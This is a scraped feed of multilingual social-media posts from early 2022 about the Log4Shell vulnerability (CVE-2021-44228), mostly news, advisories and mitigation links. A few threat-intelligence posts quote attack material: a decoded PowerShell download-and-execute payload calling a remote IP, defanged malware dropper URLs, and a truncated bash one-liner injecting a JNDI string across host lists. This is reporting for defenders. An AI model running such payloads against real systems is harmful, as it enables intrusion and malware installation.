2022-05-19 20:10:57こちらは別な脆弱性(CVE-2021-44228)です 「Lazarusとして知られる北朝鮮のハッキンググループは、Log4Jリモートコード実行の脆弱性を悪用して、VMwareHorizo​​nサーバー上で情報を盗むペイロードを… https://t.co/N7txhHkrNr https://twitter.com/i/web/status/1527380259733000203foxbook
2022-05-19 03:21:20Threat Intelligence and Protections Update Log4Shell CVE-2021-44228 https://t.co/m3PJCqwXkg https://www.massblog.xyz/threat-intelligence-and-protections-update-log4shell-cve-2021-44228/mass_blog_
2022-05-18 12:13:22過去投稿 Alibaba Cloud でのLog4jの脆弱性(CVE-2021-44228)の対応について https://t.co/gcauOsxa5t #alibabacloud https://level69.net/archives/28335?utm_source=ReviveOldPost&utm_medium=social&utm_campaign=ReviveOldPostjkudo
2022-05-17 16:11:27The #Log4j flaw (also now known as #Log4Shell) is a zero-day vulnerability (CVE-2021-44228) thatfirst came to light… https://t.co/BGS9noBvUa https://twitter.com/i/web/status/1526593953524490244threat_404
2022-05-17 06:11:10Apache announced CVE-2021-44228, a remote code execution vulnerability – assigned with a severity of 10. The source… https://t.co/3CwEw7fxX5 https://twitter.com/i/web/status/1526444303043547136AiroGlobal
2022-05-16 06:00:15🚨 Surveillance des #POC (Proof Of Concept) sur @github : 👉 CVE-2021-44228: https://t.co/gFIQpstbYI 👉 CVE-2022-1388… https://t.co/hHQ5yr4ktd https://github.com/Phineas09/CVE-2021-44228 https://twitter.com/i/web/status/1526079072593489923Prohacktiv3
2022-05-16 03:30:04CVE-2021-44228YosCiiCable
2022-05-14 18:10:25Critical Zero-Day “Log4Shell” Vulnerability “CVE-2021-44228” Exploited in the Wild https://t.co/IzMpUG8DAT https://www.massblog.xyz/critical-zero-day-log4shell-vulnerability-cve-2021-44228-exploited-in-the-wild/mass_blog_
2022-05-14 09:33:43Critical Zero-Day “Log4Shell” Vulnerability “CVE-2021-44228” Exploited in the Wild https://t.co/9YgUH1KEZk http://newsaxes.com/crucial-zero-day-log4shell-vulnerability-cve-2021-44228-exploited-within-the-wild/newsaxes
2022-05-12 14:00:24New test added for actively exploited critical CVE-2021-44228 Apache #infosec #infosecurity #cybersecurity… https://t.co/7atsA6TxXc https://twitter.com/i/web/status/1524750968851615744CyberIQs_
2022-05-12 03:53:52#GitHub's response to Log4j vulnerability CVE-2021-44228 https://t.co/MagcPNsRDb #CyberSecurity #TechJunkieNews https://t.co/ljGo334Hjw https://bit.ly/3m3UWeOtechjunkiejh
2022-05-12 02:20:06Critical Zero-Day Log4Shell #Vulnerability CVE-2021-44228 #Exploited in the Wild https://t.co/XbbVGU5CNr #Sec_Cyber https://www.securecybersolution.com/critical-zero-day-log4shell-vulnerability-cve-2021-44228-exploited-in-the-wild/CyberSecDN
2022-05-10 18:15:37A critical vulnerability was discovered in the Apache log4j project (CVE-2021-44228). Even if products and services… https://t.co/09Jd1LYdgw https://twitter.com/i/web/status/1524087383477661697DevolutionsInc
2022-05-10 14:24:40Critical Zero-Day “Log4Shell” Vulnerability “CVE-2021-44228” Exploited in the Wild https://t.co/AU5EHr9trZ… https://t.co/ZG8SD3YZWw https://blogs.quickheal.com/critical-zero-day-log4shell-vulnerability-cve-2021-44228-exploited-in-the-wild/ https://twitter.com/i/web/status/1524029580515946498CeptBiro
2022-05-10 14:18:35Critical Zero-Day “Log4Shell” Vulnerability “CVE-2021-44228” Exploited in the Wild https://t.co/m9OwKeklWG… https://t.co/dyzQOh5f5W https://blogs.quickheal.com/critical-zero-day-log4shell-vulnerability-cve-2021-44228-exploited-in-the-wild/ https://twitter.com/i/web/status/1524027281877966850ReneRobichaud
2022-05-10 12:44:32A critical zero-day vulnerability in Apache Log4j (CVE-2021-44228), a widely used Java logging library, is being le… https://t.co/be3rhlOmdK https://twitter.com/i/web/status/1524004273796780032quickheal
2022-05-10 12:31:00Important Zero-Day “Log4Shell” Vulnerability “CVE-2021-44228” Exploited within the Wild https://t.co/4G7yXXH4Xf https://newsaxes.com/important-zero-day-log4shell-vulnerability-cve-2021-44228-exploited-within-the-wild/newsaxes
2022-05-10 12:12:19Critical Zero-Day “Log4Shell” #Vulnerability “CVE-2021-44228” #Exploited in the Wild https://t.co/TNQFaWFW4c https://www.securecybersolution.com/critical-zero-day-log4shell-vulnerability-cve-2021-44228-exploited-in-the-wild/Sec_Cyber
2022-05-10 11:20:55https://t.co/sW6BEhckyS Critical Zero-Day “Log4Shell” Vulnerability “CVE-2021-44228” Exploited in the Wild #cybersecurity https://blogs.quickheal.com/critical-zero-day-log4shell-vulnerability-cve-2021-44228-exploited-in-the-wild/netsecu
2022-05-10 11:01:25Critical Zero-Day “Log4Shell” Vulnerability “CVE-2021-44228” Exploited in the Wild https://t.co/IzMpUG8DAT https://www.massblog.xyz/critical-zero-day-log4shell-vulnerability-cve-2021-44228-exploited-in-the-wild/mass_blog_
2022-05-10 09:50:46.@ProductCERT: An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228,… https://t.co/1t8g69TMrD https://twitter.com/i/web/status/1523962270782533632Woronka
2022-05-10 09:40:11An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/OQdkebyokf https://twitter.com/i/web/status/1523961018178752513ProductCERT
2022-05-08 03:50:04URGENT: Analysis and Remediation Guidance to the Log4j Zero-Day RCE (CVE-2021-44228) Vulnerability | Veracode https://t.co/B9jltzwwN1 https://newsaxes.com/urgent-evaluation-and-remediation-steering-to-the-log4j-zero-day-rce-cve-2021-44228-vulnerability-veracode-2/newsaxes
2022-05-06 11:50:541⃣ The Race to the Vulnerable:Measuring the #Log4j Library Shell Incident.CVE-2021-44228 Уязвимость нулевого дня… https://t.co/ObarhJtLap https://twitter.com/i/web/status/1522541688065040385TerratAlexandre
2022-05-05 23:52:00🚨 NEW: CVE-2021-44228 🚨 Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3… https://t.co/pFq1MnoCjJ https://twitter.com/i/web/status/1522361313728552967threatintelctr
2022-05-04 15:14:12Three months after the Apache Foundation disclosed the infamous Lo4j vulnerability [CVE-2021-44228] and issued a fi… https://t.co/otvvyg1g13 https://twitter.com/i/web/status/1521867254706626565ops_secure
2022-05-04 08:50:18@lootsec_io What's that on line 4? Is that an avenue for #log4jshell? Should be CVE-2021-44228.kenjoe41
2022-05-04 03:32:07【日本でなぜか報道されない】 気を付けるべき文字列の記事です。 本文中段に例文が載せられています。 Apache Log4j2のRCE脆弱性(CVE-2021-44228)を狙う攻撃観測 https://t.co/e0m0h7yTBT https://blogs.jpcert.or.jp/ja/2021/12/log4j-cve-2021-44228.htmltamama8gou
2022-05-04 02:20:11CVE-2021-44228: New Apache Log4j ‘Log4Shell’ Zero-Day Being Exploited in the Wild https://t.co/jkJYo8xCfe https://newsaxes.com/cve-2021-44228-new-apache-log4j-log4shell-zero-day-being-exploited-within-the-wild-2/newsaxes
2022-05-01 19:40:54過去投稿 #Azure WAFでlog4jの脆弱性(CVE-2021-44228)対策をしてみる。 https://t.co/BO1GAFV1xr https://level69.net/archives/28320?utm_source=ReviveOldPost&utm_medium=social&utm_campaign=ReviveOldPostjkudo
2022-04-30 10:00:09log4j-finder: Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228,… https://t.co/gaT5ZKiqyi https://twitter.com/i/web/status/1520341275559424000beingsheerazali
2022-04-30 09:40:05log4j-finder: Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228,… https://t.co/gUqnO8sbJN https://twitter.com/i/web/status/1520336425828470784CyberWarship
2022-04-29 14:00:28🔥HACK POC OF THE WEEK [29-APRIL-2022]🔥 CVE-2021-44228 - #Apache #Log4j Remote Code Execution Vulnerability DEMO by… https://t.co/JbkC478rnu https://twitter.com/i/web/status/1520038295392354304rahultyagihacks
2022-04-27 20:53:01ファイブアイズが「日常的に悪用される脆弱性TOP15」についての共同”アラート”を出しています。 ・【Log4Shell】CVE-2021-44228 ・【ProxyLogon】CVE-2021-26855、CVE-2021-26… https://t.co/e5oFcmaKME https://twitter.com/i/web/status/1519416997888466944foxbook
2022-04-26 16:20:57The vulnerability, listed as CVE-2021-44228 in the SERPs?drunkSEOrobot
2022-04-25 18:42:41過去投稿 Alibaba Cloud でのLog4jの脆弱性(CVE-2021-44228)の対応について https://t.co/gcauOsxa5t #alibabacloud https://level69.net/archives/28335?utm_source=ReviveOldPost&utm_medium=social&utm_campaign=ReviveOldPostjkudo
2022-04-25 12:51:00BugCrowd Bug Bounty Disclosure: P1 - Log4Shell (CVE-2021-44228) - By aminei - https://t.co/UdEK1qvNXI https://www.redpacketsecurity.com/bugcrowd-bugbounty-disclosure-p1-log4shell-cve-2021-44228-by-aminei/RedPacketSec
2022-04-25 03:11:17CodeQL能找到log4shell(CVE-2021-44228)漏洞吗? https://t.co/8sJGYNGj31 https://t.co/CubDvEmMLb https://ift.tt/WdZlMmb https://ift.tt/uZwk5RLbuaqbot
2022-04-20 18:42:17CVE-2021-44228 https://t.co/NLm0RVxfjG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-04-18 14:20:31🚨 NEW: CVE-2021-44228 🚨 Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3… https://t.co/IAskHuuXJF https://twitter.com/i/web/status/1516057273096880131threatintelctr
2022-04-16 12:30:05Personally I think it is CVE-2021-44228, and I'm not paying royalties on the JVM. I don't know how it got installed… https://t.co/Dr2PZK4tTD https://twitter.com/i/web/status/1515305547951755267mistersql
2022-04-13 01:46:09Spring4Shell (CVE-2022-22965) has dominated the information security news, but Log4Shell (CVE-2021-44228) continues… https://t.co/7OBC8Cdqow https://twitter.com/i/web/status/1514053276030939139ncxgroup
2022-04-12 19:00:37Log4j Vulnerability – Technical Details: In December 2021, log4j aka CVE-2021-44228 was publicly released and rapid… https://t.co/yKVlEIWuO1 https://twitter.com/i/web/status/1513954740828205060cipherstorm
2022-04-12 18:17:36A critical vulnerability was discovered in the Apache log4j project (CVE-2021-44228). Even if products and services… https://t.co/u8a2Foct06 https://twitter.com/i/web/status/1513940463899791360DevolutionsInc
2022-04-12 08:50:33.@ProductCERT: An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228,… https://t.co/nSu7ogsOlp https://twitter.com/i/web/status/1513800294907404291Woronka
2022-04-12 08:40:30An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/qWZeK9R2jd https://twitter.com/i/web/status/1513797596401254404ProductCERT
2022-04-11 19:18:34Yet another ITW usage of #CVE-2021-44228 (#log4shell) on Unifi Network Application. This time delivering #XMRig min… https://t.co/rJUGUoL1fq https://twitter.com/i/web/status/1513593727696183299osipov_ar
2022-04-11 15:40:36NISTでCVE-2021-44228を見ると再評価中との事で、まだ燻ってるようです 担当製品には影響ありませんが、気になる話です https://t.co/go7mD29Y3i https://twitter.com/jamesvgingerich/status/1513540123341819904moonphase16
2022-04-11 15:10:37A fully automated, reliable, super-fast, mass scanning and validation toolkit for the Log4J RCE CVE-2021-44228 vuln… https://t.co/jMVTBwRFbd https://twitter.com/i/web/status/1513534208505008140onuroktay
2022-04-11 10:50:09A fully automated, reliable, super-fast, mass scanning and validation toolkit for the Log4J RCE CVE-2021-44228 vuln… https://t.co/NzyBklLlEa https://twitter.com/i/web/status/1513468772929392648beingsheerazali
2022-04-11 05:50:15A fully automated, reliable, super-fast, mass scanning and validation toolkit for the Log4J RCE CVE-2021-44228 vuln… https://t.co/XYuYhgxD40 https://twitter.com/i/web/status/1513392047234899971Dinosn
2022-04-10 10:30:14The vulnerability, listed as CVE-2021-44228 in the SERPs.drunkSEOrobot
2022-04-08 15:20:37Since the zero-day vulnerability (CVE-2021-44228) was published, Log4j has made a huge impact on the security commu… https://t.co/rJWDo9skpe https://twitter.com/i/web/status/1512445166510120965ops_secure
2022-04-08 12:50:33CVE-2021-44228 / Log4Shell / kwetsbaarheid in de Log4j-library - publicatie https://t.co/c5yM5rKybm https://t.co/5Dc0SnJNtn https://www.google.com/calendar/event?eid=MWN0bTMxdmloajF2ajkxajJkYzhyaTY1dHYgYTN2ZWVuQG0&ctz=Europe/Amsterdam https://twitter.com/NandanLohitaksh/status/1512062011584094211a3veen
2022-04-07 06:44:02The vulnerability, listed as CVE-2021-44228 in the field?drunkSEOrobot
2022-04-06 13:34:58VMware (#log4shell: #CVE-2021-44228) -&gt; Tomcat -&gt; .ps1 -&gt; .exe -&gt; XMRig http://205.185.118[.]119/lol.ps1 same XMR… https://t.co/h1lurdXX9s https://twitter.com/i/web/status/1511695448519725062osipov_ar
2022-04-04 01:40:18Threat Intelligence and Protections Update Log4Shell CVE-2021-44228 https://t.co/m3PJCqwXkg https://www.massblog.xyz/threat-intelligence-and-protections-update-log4shell-cve-2021-44228/mass_blog_
2022-04-02 21:20:13Deep Panda APT group launches new attacks against Log4Shell vulnerability CVE-2021-44228 to install Fire Chili root… https://t.co/70HMcrYAxQ https://twitter.com/i/web/status/1510365221017247748securezoo
2022-04-01 05:30:07Forged in Fire: A Survey of MobileIron Log4Shell Exploitation! CVE-2021-44228 The immediate aftermath of this CVE’… https://t.co/jfEsMClHYc https://twitter.com/i/web/status/1509764347266211841Cyberarmsclub
2022-03-31 14:21:14Our Co-founder &amp; CTO, @LBelkind, explains how you can mitigate the next CVE-2021-44228 (a.k.a. #Log4Shell) and auto… https://t.co/MpZlRmaJ9Z https://twitter.com/i/web/status/1509531149747429386torq_io
2022-03-29 14:11:04🚨 New @Mandiant Blog: https://t.co/eXUGeC0GbT #log4j #CVE-2021-44228 #APT41 #UNC961 https://www.mandiant.com/resources/mobileiron-log4shell-exploitation7ufail
2022-03-28 14:01:06Update for advisory OBS02112-01 (log4shell /CVE-2021-44228) published: check change history for updates. https://t.co/Fhacf6OQnF #obso https://networks.unify.com/security/advisories/OBSO-2112-01.pdfUnifyCoSecurity
2022-03-27 21:50:49The vulnerability, listed as CVE-2021-44228 in the coming two weeks:drunkSEOrobot
2022-03-26 23:20:03@tolisec @ankit_anubhav @0xrb @malwrhunterteam CVE-2021-44228 exploit activity detected from 178.20.40.227 (🇷🇺) sta… https://t.co/E0n50xkUSE https://twitter.com/i/web/status/1507858899264688128bad_packets
2022-03-26 22:00:09@soyparrilla @threatjammerbot Correct – the first CVE-2021-44228 activity from 109.237.96.124 (🇷🇺) was seen on 2021… https://t.co/EKd6lzhCxA https://twitter.com/i/web/status/1507839103311618053bad_packets
2022-03-25 22:10:04Apache Log4j CVE-2021-44228 PoC(攻撃可能なコード)も公開されているので対応しないとやばいね。ログ管理ソフトと運用サーバーがどんな風なネットワーク構成になってるかによって違うんだろうけど。戦争が起きて… https://t.co/ZXroMu6yWE https://twitter.com/i/web/status/1507479939960164357no5963
2022-03-24 10:51:11Log4j CVE-2021-44228 https://t.co/QGmaeGd6Ym reddit redteamsec http://dlvr.it/SMH9MYAcooEdi
2022-03-24 10:30:50Log4j CVE-2021-44228 https://t.co/3iJUjI3CBu #redteamsec https://www.reddit.com/r/redteamsec/comments/tm2ted/log4j_cve202144228/r_redteamsec
2022-03-24 00:33:39以下脆弱性を悪用 VMware Horizon(CVE-2021-44228:Log4j2) Confluence(CVE-2021-26084) オンプレミスのExchange(CVE-2021-34473) :東京コンピュータ… https://t.co/ObrEyehzL1 https://twitter.com/i/web/status/1506788057889992711tamosan
2022-03-23 00:30:50なお、Arcserve UDP Appliance に出荷時時点で入っている MSM (に入っている log4j)は、昨年末から問題になっている log4j 脆弱性(CVE-2021-44228)の影響はありません。 とはいえ古… https://t.co/aMD64IfBvp https://twitter.com/i/web/status/1506425825742139397Arcserve_jp
2022-03-22 09:00:10@PentesterLab It absolutely has to be Log4Shell CVE-2021-44228 Remote code execution using a malicious LDAP server!… https://t.co/LGwzZANALu https://twitter.com/i/web/status/1506193131800309760bhamill638
2022-03-21 18:31:35CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-03-21 16:40:36December/2021 – CVE-2021-44228: Log4Shell Remote Code Execution Mitigation https://t.co/Xwq33YEmQy https://t.co/oICtCT0PYe https://www.haproxy.com/blog/december-2021-log4shell-mitigation/?utm_source=dlvr.it&utm_medium=twitterBestFreeProxy9
2022-03-20 18:30:09CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-03-20 14:30:20🇮🇳 hxxp://117.198.252[.]67:39150/Mozi.m attempt to exploit CVE-2021-44228 #Log4j vulnerability against our honeypot. https://t.co/m2Y8DA14Rnrythensec
2022-03-20 09:30:05The exploitation of the new vulnerability identified as CVE-2021-44228 affecting the java logging package, Log4J.… https://t.co/XA9b7Hce23 https://twitter.com/i/web/status/1505475780239040512ManieshNeupane
2022-03-19 15:10:53CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-03-19 03:20:24CVE-2021-44228 https://t.co/xcaqrfMe3h – ThreatPost Article https://t.co/57ErOVLHDd https://t.co https://dorkingbeauty1.wordpress.com/2022/03/19/cve-2021-44228-t-co-threatpost-article/dorkingbeauty1
2022-03-18 23:31:54🚨CloudSEK ont identifié que plus de 130 applications Android ont des API backend affectées par CVE-2021-44228 (Log4… https://t.co/M9HIxW2VWo https://twitter.com/i/web/status/1504962298716336142HaboubiAnis
2022-03-18 14:13:02Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2022-23812: 423.3K (audience size) CVE-2021-44228: 413.6K CVE-2022… https://t.co/gbXmq30tD4 https://twitter.com/i/web/status/1504819923272544260CVEtrends
2022-03-18 03:07:24🔺 Explotación masiva de VMWare Horizon vía #Log4Shell (CVE-2021-44228) para instalación de Minero. IP atacante: 1… https://t.co/nq9Lbf1cst https://twitter.com/i/web/status/15046536498338652571ZRR4H
2022-03-18 02:11:17Example CVE-2021-44228 payload (decoded): IEX (New-Object System. Net.Webclient).DownloadString('http://14.55.65.21… https://t.co/5mZD6JCx5s https://twitter.com/i/web/status/1504639326893731840bad_packets
2022-03-16 02:52:51without CVE-2021-44228 ? https://t.co/RiuMb8iexY https://t.co/4LJU6KIkEy https://www.tenable.com/blog/behind-the-scenes-how-we-picked-2021s-top-vulnerabilities-and-what-we-left-outchybeta
2022-03-15 10:50:09🚨 NEW: CVE-2021-44228 🚨 Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3… https://t.co/30IKuGVwc8 https://twitter.com/i/web/status/1503683233376256002threatintelctr
2022-03-15 10:30:03Proteja continuamente sus aplicaciones y busque la vulnerabilidad log4j CVE-2021-44228 con la capacidad de prueba d… https://t.co/obgzdzSec2 https://twitter.com/i/web/status/1503679902893199363HCLSoftware
2022-03-15 08:50:13🚨 NEW: CVE-2021-44228 🚨 Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3… https://t.co/hFvO6PLPux https://twitter.com/i/web/status/1503653032650842115threatintelctr
2022-03-14 23:40:10Apache Log4j Remote Code Execution #Vulnerability A critical Remote code execution vulnerability, #CVE-2021-44228,… https://t.co/GyVvpWlYK4 https://twitter.com/i/web/status/1503513815954206723encryptioncons
2022-03-14 20:53:13🚨 NEW: CVE-2021-44228 🚨 Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3… https://t.co/wqsmpPXwCN https://twitter.com/i/web/status/1503471840261509128threatintelctr
2022-03-14 14:31:13Months after the Apache Foundation issued a patch for Lo4j vulnerability CVE-2021-44228, more than 4 in 10 download… https://t.co/Pz1u7XC4w6 https://twitter.com/i/web/status/1503375835826462734waratek
2022-03-14 14:10:32Have you heard about the new critical vulnerability CVE-2021-44228 ( #Log4Shell )? Using #log4j2 in your #webapp? G… https://t.co/kzLKwpCkKh https://twitter.com/i/web/status/1503370599611179008tomitribe
2022-03-14 11:50:24CVE-2021-44228 - Log4j - MINECRAFT VULNERABLE! (and SO MUCH MORE) https://t.co/ynYwyHX3Iz via @YouTube https://youtu.be/7qoPDq41xhQMasterTherion9
2022-03-14 08:20:07Esri's statement regarding ArcGIS and CVE-2021-44228 Apache Log4j 2. Read for the latest regarding this concern.… https://t.co/1AYkweJpjW https://twitter.com/i/web/status/1503283551420272641Husse1nAhmad
2022-03-14 07:12:36CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-03-12 19:00:05- aumento nelle attività di Exploitation CVE-2019-12263 (Multiple WindRiver CVE); CVE-2021-44228 (Log4j); CVE-2017… https://t.co/bLxKFAIA2J https://twitter.com/i/web/status/1502720839317348355Fortgale_Cyber
2022-03-11 16:00:22Continuously security your applications and scan for log4j vulnerability CVE-2021-44228 with #HCLAppScan's Dynamic… https://t.co/FIqTiRrP44 https://twitter.com/i/web/status/1502313405947936769HCLSoftware
2022-03-10 10:30:12- Threat? CVE-2021-44228 is particularly serious because to Log4j's widespread use. Log4j is used for logging in a… https://t.co/4LleqhxdVK https://twitter.com/i/web/status/1501867328925224965thatyash_
2022-03-09 16:10:16https://t.co/anU5kqC6Sg Advice for Defenders Responding to the log4j Vulnerability CVE-2021-44228 #cybersecurity https://binarydefense.com/advice-for-defenders-responding-to-the-log4j-vulnerability-cve-2021-44228/netsecu
2022-03-09 10:00:44Mitigate Apache Log4j CVE-2021-44228 (also known as #Log4Shell and #LogJam) in our guide that outlines the steps th… https://t.co/HEB0byD9NW https://twitter.com/i/web/status/1501496766646009856logit_io
2022-03-09 05:30:25SAP March 2022 Security Patch Day addresses 2 new Critical vulnerabilities (to include fix for log4j CVE-2021-44228… https://t.co/tHo8N6JvdE https://twitter.com/i/web/status/1501427904512675843securezoo
2022-03-09 03:01:38友達と遊ぶために立ててるマイクラ鯖に `Dejmnok420`なるユーザーが接続してきた おそらくBOT。 ちょっと前に流行ったCVE-2021-44228をしてきてたhashy0917
2022-03-08 15:21:04APT41 also used CVE-2021-44228, which everyone should be familiar with by now. Attribution matters. THIS log4shell… https://t.co/KMfRMAzVCh https://twitter.com/i/web/status/1501214691238072330ImposeCost
2022-03-08 11:53:24.@ProductCERT: An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228,… https://t.co/CTSAHlg0Hq https://twitter.com/i/web/status/1501161883499327489Woronka
2022-03-08 11:21:51An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/oMtyn50FFo https://twitter.com/i/web/status/1501155177277145089ProductCERT
2022-03-07 11:52:00The vulnerability, listed as CVE-2021-44228 in the ne….drunkSEOrobot
2022-03-04 10:44:17🔊Критическая уязвимость Log4Shell ( CVE-2021-44228 ) используется злоумышленниками для развертывания различных поле… https://t.co/SSGabhsyAV https://twitter.com/i/web/status/1499693824964239364it2bsns
2022-03-04 04:50:13The vulnerability, listed as CVE-2021-44228 in the US.drunkSEOrobot
2022-03-03 08:31:06Thread. 1/n A report from Recorded Future notes exploitable vulns being targeted by Russia: CVE-2021-44228: Apache… https://t.co/bVvWaTyPUl https://twitter.com/i/web/status/1499300320081596418iCyberFighter
2022-03-02 19:11:45A critical vulnerability was discovered in the Apache log4j project (CVE-2021-44228). Even if products and services… https://t.co/PL0oVstQgf https://twitter.com/i/web/status/1499097514032648195DevolutionsInc
2022-03-01 23:54:28🚨 NEW: CVE-2021-44228 🚨 Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3… https://t.co/EBpj4qcPwf https://twitter.com/i/web/status/1498806094428262410threatintelctr
2022-03-01 21:10:56A critical vulnerability was discovered in the Apache log4j project (CVE-2021-44228). Even if products and services… https://t.co/Uy90ciqk5q https://twitter.com/i/web/status/1498765245959098370remotedeskman
2022-03-01 00:18:21Spectrum Addressing for Big Data - Log4J - CVE-2021-44228, CVE-2021-45046, CVE-2021-45105: Remediation. After extra… https://t.co/T9YgKaVYpp https://twitter.com/i/web/status/1498448018994958337SuriyaSubraman
2022-02-28 23:55:17While the security industry is still recovering from the aftermath of “Log4j” CVE-2021-44228, we can't lose sight o… https://t.co/kA0OqaOIyK https://twitter.com/i/web/status/1498444161363628035TrellixLabs
2022-02-27 22:20:07CVE-2021-44228 PoC log4j bypass words JNDI Log4j exploit bypass word filters. https://t.co/ntr3vEMGce https://t.co/5qD7fukrKx https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-wordsbrianlinux
2022-02-27 18:10:05CVE-2021-44228 or Log4Shell or LogJam. #log4jViktorStan
2022-02-27 17:20:04Повествование о Minecraft: или CVE-2021-44228 в цвете - Log4Shell и немного сюжета О, привет, а ты уже здесь, да?… https://t.co/RFaPd0uvzW https://twitter.com/i/web/status/1497984157179334661IT_news_for_all
2022-02-26 02:30:09ONE LINER for log4shell or CVE-2021-44228 bash: cat hosts.txt | sed 's/https\?:\/\///' | xargs -I {} echo '{}/${j… https://t.co/ghfF3jNAR7 https://twitter.com/i/web/status/1497396468604309504syarifsajjad
2022-02-24 16:00:45RCE-log4jrce CVE-2021-44228 Yay, I was awarded a $3,600 bounty on @Hacker0x01! https://t.co/JRIv8Fju4i… https://t.co/PczSWdJpCV https://hackerone.com/lu3ky-13 https://twitter.com/i/web/status/1496876475626459137lu3ky13
2022-02-23 15:20:08Learn more about vCenter Server CVE-2021-44228 and the CVE-2021-45046 workaround on the latest vCommunity podcast f… https://t.co/RhvB3xhUJN https://twitter.com/i/web/status/1496504550416695297PiotrTarnawski
2022-02-23 14:01:57The vulnerability, listed as CVE-2021-44228 in the runoff.drunkSEOrobot
2022-02-23 14:00:21Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44228: 342.8K (audience size) CVE-2021-45046: 339.9K CVE-2022… https://t.co/IegLrW0biW https://twitter.com/i/web/status/1496485000702836739CVEtrends
2022-02-22 15:50:25Learn more about vCenter Server CVE-2021-44228 and the CVE-2021-45046 workaround on the latest vCommunity podcast f… https://t.co/XqxJjuk36v https://twitter.com/i/web/status/1496147782868078597VMware
2022-02-22 02:11:21Search in Pics: The vulnerability, listed as CVE-2021-44228 in the wild!drunkSEOrobot
2022-02-20 20:10:53🚀 いよいよ明日!Log4Shell ライブハック開催! CVE-2021-44228 脆弱性の検出と修正のデモを実施 ✅ Log4jの脆弱性であるLog4Shellの対策方法を検討している ✅ オープンソースなどの脆弱性対策… https://t.co/dI8nsnVWcY https://twitter.com/i/web/status/1495488449465495555snykJP
2022-02-19 16:56:03🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/Bcyg3VuVI8 https://twitter.com/i/web/status/1495076518560739332threatintelctr
2022-02-19 16:53:56TAK @eoThica @mbulskov og @termansen jeg har uninstallered Minecraft fra mine PC og Log4j2 RCE CVE-2021-44228 nor… https://t.co/AkThSJqLYC https://twitter.com/i/web/status/1495076939928948737_Mirror_man
2022-02-19 15:44:31#twitterhjerne Norton blocks this Log4j2 RCE CVE-2021-44228 fra "localhost (127.0.0.1, 51400)",http://127.0.0.1:… https://t.co/YALNmgmG0P https://twitter.com/i/web/status/1495058505346207749_Mirror_man
2022-02-19 09:40:04CMTY Podcast #592 - Additional step for vCenter Server CVE-2021-44228 and CVE-20... https://t.co/vp1YimMHhe https://dy.si/mBobBdsimelka
2022-02-19 05:00:21🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/ygohykgB2e https://twitter.com/i/web/status/1494895323998732289threatintelctr
2022-02-19 04:50:30Learn more about vCenter Server CVE-2021-44228 and the CVE-2021-45046 workaround on the latest vCommunity podcast f… https://t.co/fBSGpaGrmf https://twitter.com/i/web/status/1494897036222681091VMware
2022-02-18 19:03:29CVE-2021-44228 https://t.co/NLm0RVxfjG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-02-18 10:40:52CVE-2021-44228がヤバイそう、、。_Z_HACK
2022-02-18 09:53:52vSphere 製品でよく参照される KBTop5をご紹介致します。 Top1 は、 Workaround instructions to address CVE-2021-44228 and CVE-2021-45046 in… https://t.co/fjkY3L9ggX https://twitter.com/i/web/status/1494597674003275780VMware_Japan
2022-02-18 08:48:08CMTY Podcast #592 - Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround https://t.co/Q5OVh0XZBc https://dy.si/XvFkXCloudITBlog
2022-02-18 05:13:01CMTY Podcast #592 - Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround https://t.co/Gh5rNfIE2l https://dy.si/3rSiFP2RandhirChaubey
2022-02-18 05:12:33CMTY Podcast #592 - Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround https://t.co/cuYU449id2 https://dy.si/ZdHkW3RandhirChaubey
2022-02-18 05:12:04CMTY Podcast #592 - Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround https://t.co/d1JYD5f4IY https://dy.si/y364MRandhirChaubey
2022-02-18 05:11:36CMTY Podcast #592 - Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround https://t.co/g7NpRZmcZo https://dy.si/MbwitKRandhirChaubey
2022-02-18 05:11:09CMTY Podcast #592 - Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround https://t.co/pxYjMFEbM4 https://dy.si/7kJSWRandhirChaubey
